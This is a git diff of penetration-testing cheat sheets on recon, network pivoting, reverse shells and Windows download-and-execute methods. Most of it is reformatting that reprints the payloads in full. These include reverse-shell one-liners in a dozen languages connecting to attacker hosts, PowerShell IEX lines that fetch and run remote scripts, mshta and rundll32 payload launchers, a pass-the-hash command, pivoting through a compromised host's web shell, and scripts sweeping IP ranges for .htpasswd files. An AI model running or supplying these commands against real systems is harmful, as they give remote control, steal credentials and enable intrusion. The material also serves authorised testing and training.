* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
|
||||
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
|
@ -1,50 +1,59 @@
|
||||
# Bug Hunting Methodology and Enumeration
|
||||
![exploitation](https://img.shields.io/badge/WIP-70%25-green.svg)
|
||||
|
||||
**Summary**
|
||||
1. [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
|
||||
* Subbrute
|
||||
* KnockPy
|
||||
* GoogleDorks
|
||||
* EyeWitness
|
||||
* Sublist3r
|
||||
* Aquatone
|
||||
2. [Passive Recon](#passive-recon)
|
||||
* Shodan
|
||||
* Wayback Machine
|
||||
* The Harvester
|
||||
3. [Active Recon](#active-recon)
|
||||
* Nmap
|
||||
* Nmap Script
|
||||
* RPCClient
|
||||
* Enum4all
|
||||
4. [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
|
||||
* Gobuster
|
||||
* Backup File Artifacts Checker
|
||||
5. [Web Vulnerabilities](#looking-for-web-vulnerabilities)
|
||||
* Repository Github
|
||||
* Burp
|
||||
* Web Checklist
|
||||
* Nikto
|
||||
* Payment functionality
|
||||
## Summary
|
||||
|
||||
* [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
|
||||
* Subbrute
|
||||
* KnockPy
|
||||
* GoogleDorks
|
||||
* EyeWitness
|
||||
* Sublist3r
|
||||
* Aquatone
|
||||
|
||||
* [Passive Recon](#passive-recon)
|
||||
* Shodan
|
||||
* Wayback Machine
|
||||
* The Harvester
|
||||
|
||||
* [Active Recon](#active-recon)
|
||||
* Nmap
|
||||
* Nmap Script
|
||||
* RPCClient
|
||||
* Enum4all
|
||||
|
||||
* [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
|
||||
* Gobuster
|
||||
* Backup File Artifacts Checker
|
||||
|
||||
* [Web Vulnerabilities](#looking-for-web-vulnerabilities)
|
||||
* Repository Github
|
||||
* Burp
|
||||
* Web Checklist
|
||||
* Nikto
|
||||
* Payment functionality
|
||||
|
||||
## Enumerate all subdomains (only if the scope is *.domain.ext)
|
||||
|
||||
* Using Subbrute
|
||||
### Using Subbrute
|
||||
|
||||
```bash
|
||||
git clone https://github.com/TheRook/subbrute
|
||||
python subbrute.py domain.example.com
|
||||
```
|
||||
|
||||
* Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
|
||||
### Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
|
||||
|
||||
```bash
|
||||
git clone https://github.com/guelfoweb/knock
|
||||
git clone https://github.com/danielmiessler/SecLists.git
|
||||
knockpy domain.com -w subdomains-top1mil-110000.txt
|
||||
```
|
||||
|
||||
* Using Google Dorks and Google Transparency Report
|
||||
### Using Google Dorks and Google Transparency Report
|
||||
|
||||
You need to include subdomains ;)
|
||||
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
||||
|
||||
```bash
|
||||
site:*.domain.com -www
|
||||
site:domain.com filetype:pdf
|
||||
@ -52,19 +61,18 @@ site:domain.com inurl:'&'
|
||||
site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
|
||||
site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
|
||||
site:*.*.domain.com
|
||||
|
||||
You need to include subdomains ;)
|
||||
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
||||
```
|
||||
|
||||
* Subdomain take over using HostileSubBruteForcer
|
||||
### Subdomain take over using HostileSubBruteForcer
|
||||
|
||||
```bash
|
||||
git clone https://github.com/nahamsec/HostileSubBruteforcer
|
||||
chmox +x sub_brute.rb
|
||||
./sub_brute.rb
|
||||
```
|
||||
|
||||
* EyeWitness and Nmap scans from the KnockPy and enumall scans
|
||||
### EyeWitness and Nmap scans from the KnockPy and enumall scans
|
||||
|
||||
```bash
|
||||
git clone https://github.com/ChrisTruncer/EyeWitness.git
|
||||
./setup/setup.sh
|
||||
@ -74,7 +82,8 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
|
||||
./EyeWitness -f rdp.txt --rdp
|
||||
```
|
||||
|
||||
* Using Sublist3r
|
||||
### Using Sublist3r
|
||||
|
||||
```bash
|
||||
To enumerate subdomains of specific domain and show the results in realtime:
|
||||
python sublist3r.py -v -d example.com
|
||||
@ -88,8 +97,9 @@ python sublist3r.py -e google,yahoo,virustotal -d example.com
|
||||
python sublist3r.py -b -d example.com
|
||||
```
|
||||
|
||||
* Using Aquatone
|
||||
```
|
||||
### Using Aquatone
|
||||
|
||||
```powershell
|
||||
gem install aquatone
|
||||
|
||||
Discover subdomains : results in ~/aquatone/example.com/hosts.txt
|
||||
@ -108,28 +118,31 @@ Final results
|
||||
aquatone-gather --domain example.com
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Passive recon
|
||||
|
||||
* Using Shodan (https://www.shodan.io/) to detect similar app
|
||||
```
|
||||
|
||||
```bash
|
||||
can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
|
||||
nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
|
||||
```
|
||||
|
||||
* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints,
|
||||
```
|
||||
* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
|
||||
|
||||
```bash
|
||||
look for JS files, old links
|
||||
```
|
||||
|
||||
* Using The Harvester (https://github.com/laramies/theHarvester)
|
||||
```
|
||||
|
||||
```python
|
||||
python theHarvester.py -b all -d domain.com
|
||||
```
|
||||
|
||||
|
||||
## Active recon
|
||||
|
||||
* Basic NMAP
|
||||
|
||||
```bash
|
||||
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
|
||||
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
|
||||
@ -143,6 +156,7 @@ aquatone-gather --domain example.com
|
||||
|
||||
* CTF NMAP
|
||||
This configuration is enough to do a basic check for a CTF VM
|
||||
|
||||
```bash
|
||||
nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
|
||||
|
||||
@ -153,8 +167,8 @@ aquatone-gather --domain example.com
|
||||
After this quick command you can add "-p-" to run a full scan while you work with the previous result
|
||||
```
|
||||
|
||||
|
||||
* Aggressive NMAP
|
||||
|
||||
```bash
|
||||
nmap -A -T4 scanme.nmap.org
|
||||
• -A: Enable OS detection, version detection, script scanning, and traceroute
|
||||
@ -162,17 +176,20 @@ aquatone-gather --domain example.com
|
||||
```
|
||||
|
||||
* NMAP and add-ons
|
||||
1. Using searchsploit to detect vulnerable services
|
||||
```bash
|
||||
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
|
||||
```
|
||||
2. Generating nice scan report
|
||||
```bash
|
||||
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
|
||||
```
|
||||
* Using searchsploit to detect vulnerable services
|
||||
|
||||
```bash
|
||||
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
|
||||
```
|
||||
|
||||
* Generating nice scan report
|
||||
|
||||
```bash
|
||||
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
|
||||
```
|
||||
|
||||
* NMAP Scripts
|
||||
|
||||
```bash
|
||||
nmap -sC : equivalent to --script=default
|
||||
|
||||
@ -202,21 +219,24 @@ aquatone-gather --domain example.com
|
||||
```
|
||||
|
||||
* RPCClient
|
||||
|
||||
```bash
|
||||
╰─$ rpcclient -U "" [target host]
|
||||
rpcclient $> querydominfo
|
||||
Domain: WORKGROUP
|
||||
Server: METASPLOITABLE
|
||||
Comment: metasploitable server (Samba 3.0.20-Debian)
|
||||
Total Users: 35
|
||||
Domain: WORKGROUP
|
||||
Server: METASPLOITABLE
|
||||
Comment: metasploitable server (Samba 3.0.20-Debian)
|
||||
Total Users: 35
|
||||
|
||||
rpcclient $> enumdomusers
|
||||
user:[games] rid:[0x3f2]
|
||||
user:[nobody] rid:[0x1f5]
|
||||
user:[bind] rid:[0x4ba]
|
||||
```
|
||||
|
||||
* Enum4all
|
||||
```
|
||||
|
||||
```bash
|
||||
Usage: ./enum4linux.pl [options]ip
|
||||
-U get userlist
|
||||
-M get machine list*
|
||||
@ -232,102 +252,89 @@ aquatone-gather --domain example.com
|
||||
==============================
|
||||
| Users on XXX.XXX.XXX.XXX |
|
||||
==============================
|
||||
index: 0x1 Account: games Name: games Desc: (null)
|
||||
index: 0x2 Account: nobody Name: nobody Desc: (null)
|
||||
index: 0x3 Account: bind Name: (null) Desc: (null)
|
||||
index: 0x4 Account: proxy Name: proxy Desc: (null)
|
||||
index: 0x5 Account: syslog Name: (null) Desc: (null)
|
||||
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
|
||||
index: 0x7 Account: www-data Name: www-data Desc: (null)
|
||||
index: 0x8 Account: root Name: root Desc: (null)
|
||||
|
||||
index: 0x1 Account: games Name: games Desc: (null)
|
||||
index: 0x2 Account: nobody Name: nobody Desc: (null)
|
||||
index: 0x3 Account: bind Name: (null) Desc: (null)
|
||||
index: 0x4 Account: proxy Name: proxy Desc: (null)
|
||||
index: 0x5 Account: syslog Name: (null) Desc: (null)
|
||||
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
|
||||
index: 0x7 Account: www-data Name: www-data Desc: (null)
|
||||
index: 0x8 Account: root Name: root Desc: (null)
|
||||
```
|
||||
|
||||
## List all the subdirectories and files
|
||||
|
||||
* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
|
||||
```bash
|
||||
git clone https://github.com/mazen160/bfac
|
||||
|
||||
Check a single URL
|
||||
bfac --url http://example.com/test.php --level 4
|
||||
```bash
|
||||
git clone https://github.com/mazen160/bfac
|
||||
|
||||
Check a list of URLs
|
||||
bfac --list testing_list.txt
|
||||
```
|
||||
Check a single URL
|
||||
bfac --url http://example.com/test.php --level 4
|
||||
|
||||
Check a list of URLs
|
||||
bfac --list testing_list.txt
|
||||
```
|
||||
|
||||
* Using DirBuster or GoBuster
|
||||
```bash
|
||||
./gobuster -u http://buffered.io/ -w words.txt -t 10
|
||||
-u url
|
||||
-w wordlist
|
||||
-t threads
|
||||
|
||||
More subdomain :
|
||||
./gobuster -m dns -w subdomains.txt -u google.com -i
|
||||
```bash
|
||||
./gobuster -u http://buffered.io/ -w words.txt -t 10
|
||||
-u url
|
||||
-w wordlist
|
||||
-t threads
|
||||
|
||||
gobuster -w wordlist -u URL -r -e
|
||||
```
|
||||
More subdomain :
|
||||
./gobuster -m dns -w subdomains.txt -u google.com -i
|
||||
|
||||
gobuster -w wordlist -u URL -r -e
|
||||
```
|
||||
|
||||
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||
```
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||
```
|
||||
|
||||
* Using a script to detect all .htpasswd files in a range of IPs
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||
```
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||
```
|
||||
|
||||
## Looking for Web vulnerabilities
|
||||
|
||||
* Look for private information in GitHub repos with GitRob
|
||||
```
|
||||
git clone https://github.com/michenriksen/gitrob.git
|
||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||
```
|
||||
|
||||
```bash
|
||||
git clone https://github.com/michenriksen/gitrob.git
|
||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||
```
|
||||
|
||||
* Explore the website with a proxy (ZAP/Burp Suite)
|
||||
1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
|
||||
2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
|
||||
3. Explore and understand available functionality, noting areas that correspond to vulnerability types
|
||||
```bash
|
||||
Burp Proxy configuration on port 8080 (in .bashrc):
|
||||
alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
|
||||
alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
|
||||
1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
|
||||
2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
|
||||
3. Explore and understand available functionality, noting areas that correspond to vulnerability types
|
||||
|
||||
then launch Burp with : java -jar burpsuite_free_v*.jar &
|
||||
```
|
||||
```bash
|
||||
Burp Proxy configuration on port 8080 (in .bashrc):
|
||||
alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
|
||||
alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
|
||||
|
||||
* Checklist for Web vulns
|
||||
```
|
||||
[] AWS Amazon Bucket S3
|
||||
[] Git Svn insecure files
|
||||
[] CVE Shellshock Heartbleed
|
||||
[] Open redirect
|
||||
[] Traversal directory
|
||||
[] XSS injection
|
||||
[] CRLF injection
|
||||
[] CSRF injection
|
||||
[] SQL injection
|
||||
[] NoSQL injection
|
||||
[] PHP include
|
||||
[] Upload insecure files
|
||||
[] SSRF injection
|
||||
[] XXE injections
|
||||
[] CSV injection
|
||||
[] PHP serialization
|
||||
...
|
||||
```
|
||||
then launch Burp with : java -jar burpsuite_free_v*.jar &
|
||||
```
|
||||
|
||||
* [Checklist for Web vulns](http://mdsec.net/wahh/tasks.html)
|
||||
|
||||
* Subscribe to the site and pay for the additional functionality to test
|
||||
|
||||
* Launch a Nikto scan in case you missed something
|
||||
```
|
||||
|
||||
```powershell
|
||||
nikto -h http://domain.example.com
|
||||
```
|
||||
|
||||
@ -355,7 +362,7 @@ International test card numbers and tokens
|
||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||
|
||||
|
||||
## Thanks to
|
||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
||||
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
|
||||
|
||||
* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
|
||||
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
|
||||
|
@ -1,20 +1,22 @@
|
||||
# Network Pivoting Techniques
|
||||
|
||||
## Windows netsh Port Forwarding
|
||||
|
||||
```powershell
|
||||
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
|
||||
|
||||
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
|
||||
```
|
||||
|
||||
1. listenaddress – is a local IP address waiting for a connection.
|
||||
2. listenport – local listening TCP port (the connection is waited on it).
|
||||
3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
|
||||
4. connectport – is a TCP port to which the connection from listenport is forwarded to.
|
||||
|
||||
|
||||
## SSH
|
||||
|
||||
### SOCKS Proxy
|
||||
|
||||
```bash
|
||||
ssh -D8080 [user]@[host]
|
||||
|
||||
@ -24,64 +26,75 @@ ssh -N -f -D 9000 [user]@[host]
|
||||
```
|
||||
|
||||
### Local Port Forwarding
|
||||
|
||||
```bash
|
||||
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
|
||||
```
|
||||
|
||||
|
||||
### Remote Port Forwarding
|
||||
|
||||
```bash
|
||||
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
|
||||
```
|
||||
|
||||
## Proxychains
|
||||
|
||||
**Config file**: /etc/proxychains.conf
|
||||
|
||||
```bash
|
||||
[ProxyList]
|
||||
socks4 localhost 8080
|
||||
```
|
||||
|
||||
Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
|
||||
|
||||
## Web SOCKS - reGeorg
|
||||
```
|
||||
|
||||
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
|
||||
|
||||
```python
|
||||
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
|
||||
```
|
||||
|
||||
## Rpivot
|
||||
|
||||
Server (Attacker box)
|
||||
|
||||
```python
|
||||
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
|
||||
```
|
||||
|
||||
Client (Compromised box)
|
||||
|
||||
```python
|
||||
python client.py --server-ip <ip> --server-port 9443
|
||||
```
|
||||
|
||||
Through corporate proxy
|
||||
|
||||
```python
|
||||
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
|
||||
```
|
||||
|
||||
Passing the hash
|
||||
|
||||
```python
|
||||
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
|
||||
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||
```
|
||||
|
||||
|
||||
## Basic Pivoting Types
|
||||
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| Listen - Listen | Exposed asset, may not want to connect out. |
|
||||
| Listen - Connect | Normal redirect. |
|
||||
| Connect - Connect | Can’t bind, so connect to bridge two hosts |
|
||||
|
||||
|
||||
## Listen - Listen
|
||||
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
|
||||
@ -89,8 +102,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
| remote host 1 | `ncat localhost 8080 < file` |
|
||||
| remote host 2 | `ncat localhost 9090 > newfile` |
|
||||
|
||||
|
||||
## Listen - Connect
|
||||
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
|
||||
@ -98,8 +111,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
| remote host 1 | `ncat localhost -p 8080 < file` |
|
||||
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||
|
||||
|
||||
## Connect - Connect
|
||||
|
||||
| Type | Use Case |
|
||||
| :------------- | :------------------------------------------ |
|
||||
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
|
||||
@ -107,7 +120,7 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
| remote host 1 | `ncat -l -p 8080 < file |
|
||||
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
||||
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
|
||||
|
||||
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
||||
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
|
||||
|
@ -3,6 +3,7 @@
|
||||
## Reverse Shell Cheat Sheet
|
||||
|
||||
### Bash TCP
|
||||
|
||||
```bash
|
||||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
|
||||
@ -10,7 +11,8 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
```
|
||||
|
||||
### Bash UDP
|
||||
```
|
||||
|
||||
```bash
|
||||
Victim:
|
||||
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
|
||||
|
||||
@ -18,8 +20,8 @@ Listener:
|
||||
nc -u -lvp 4242
|
||||
```
|
||||
|
||||
|
||||
### Perl
|
||||
|
||||
```perl
|
||||
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
|
||||
@ -31,16 +33,19 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
|
||||
```
|
||||
|
||||
### Python
|
||||
|
||||
```python
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
```
|
||||
|
||||
### PHP
|
||||
|
||||
```bash
|
||||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
```
|
||||
|
||||
### Ruby
|
||||
|
||||
```ruby
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
|
||||
@ -50,24 +55,27 @@ NOTE: Windows only
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
|
||||
|
||||
### Netcat Traditional
|
||||
|
||||
```bash
|
||||
nc -e /bin/sh [IPADDR] [PORT]
|
||||
```
|
||||
|
||||
### Netcat OpenBsd
|
||||
|
||||
```bash
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
```
|
||||
|
||||
### Ncat
|
||||
|
||||
```bash
|
||||
ncat 127.0.0.1 4444 -e /bin/bash
|
||||
ncat --udp 127.0.0.1 4444 -e /bin/bash
|
||||
```
|
||||
|
||||
### Powershell
|
||||
|
||||
```powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
@ -76,12 +84,12 @@ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sock
|
||||
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
|
||||
```
|
||||
|
||||
### Java
|
||||
|
||||
```java
|
||||
r = Runtime.getRuntime()
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
@ -89,6 +97,7 @@ p.waitFor()
|
||||
```
|
||||
|
||||
### NodeJS
|
||||
|
||||
```javascript
|
||||
(function(){
|
||||
var net = require("net"),
|
||||
@ -104,33 +113,36 @@ p.waitFor()
|
||||
})();
|
||||
|
||||
|
||||
or
|
||||
or
|
||||
|
||||
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||||
|
||||
or
|
||||
or
|
||||
|
||||
-var x = global.process.mainModule.require
|
||||
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||||
```
|
||||
|
||||
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
|
||||
|
||||
NOTE: Java reverse shell also work for Groovy
|
||||
|
||||
```javascript
|
||||
String host="localhost";
|
||||
int port=8044;
|
||||
String cmd="cmd.exe";
|
||||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||||
```
|
||||
NOTE: Java reverse shell also work for Groovy
|
||||
|
||||
|
||||
## Spawn TTY
|
||||
```
|
||||
|
||||
```bash
|
||||
/bin/sh -i
|
||||
```
|
||||
|
||||
(From an interpreter)
|
||||
```
|
||||
|
||||
```powershell
|
||||
python -c 'import pty; pty.spawn("/bin/sh")'
|
||||
perl -e 'exec "/bin/sh";'
|
||||
perl: exec "/bin/sh";
|
||||
@ -139,25 +151,29 @@ lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||
```
|
||||
/!\ OhMyZSH might break this trick
|
||||
|
||||
```powershell
|
||||
ctrl+z
|
||||
stty raw -echo
|
||||
fg
|
||||
```
|
||||
/!\ OhMyZSH might break this trick
|
||||
|
||||
(From within vi)
|
||||
```
|
||||
|
||||
```bash
|
||||
:!bash
|
||||
:set shell=/bin/bash:shell
|
||||
```
|
||||
|
||||
(From within nmap)
|
||||
```
|
||||
|
||||
```sh
|
||||
!sh
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
||||
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
|
||||
|
@ -1,89 +1,99 @@
|
||||
# Windows - Download and execute methods
|
||||
|
||||
## Downloaded files location
|
||||
|
||||
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
|
||||
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
|
||||
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
|
||||
|
||||
## Powershell
|
||||
|
||||
From an HTTP server
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
|
||||
```
|
||||
|
||||
From a Webdav server
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
|
||||
## Cmd
|
||||
```
|
||||
|
||||
```powershell
|
||||
cmd.exe /k < \\webdavserver\folder\batchfile.txt
|
||||
```
|
||||
|
||||
## Cscript / Wscript
|
||||
```
|
||||
|
||||
```powershell
|
||||
cscript //E:jscript \\webdavserver\folder\payload.txt
|
||||
```
|
||||
|
||||
## Mshta
|
||||
```
|
||||
|
||||
```powershell
|
||||
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
mshta http://webserver/payload.hta
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
mshta \\webdavserver\folder\payload.hta
|
||||
```
|
||||
|
||||
## Rundll32
|
||||
```
|
||||
|
||||
```powershell
|
||||
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||||
```
|
||||
|
||||
## Regasm / Regsvc @subTee
|
||||
```
|
||||
|
||||
```powershell
|
||||
